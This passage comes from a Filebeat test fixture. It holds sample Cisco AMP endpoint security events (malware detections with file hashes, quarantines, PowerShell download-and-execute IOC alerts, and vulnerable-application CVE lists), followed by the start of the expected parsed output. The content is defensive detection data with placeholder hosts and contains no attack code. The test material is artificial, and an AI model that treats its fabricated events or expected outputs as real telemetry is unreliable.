Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json new file mode 100644 index 00000000000..4a602ba1c2b --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json @@ -0,0 +1,2356 @@ +[ + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 742000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "c877b67a5733c59d0d8ed8d519df0c91", + "file.hash.sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046", + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "c877b67a5733c59d0d8ed8d519df0c91", + "128aa78059540cf0cdae2a3cea30cd80e00f2046" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:15:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6533243623469744000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 1358, + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT657.tmp", + "file.path": "\\\\?\\C:\\BIT657.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2295, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + 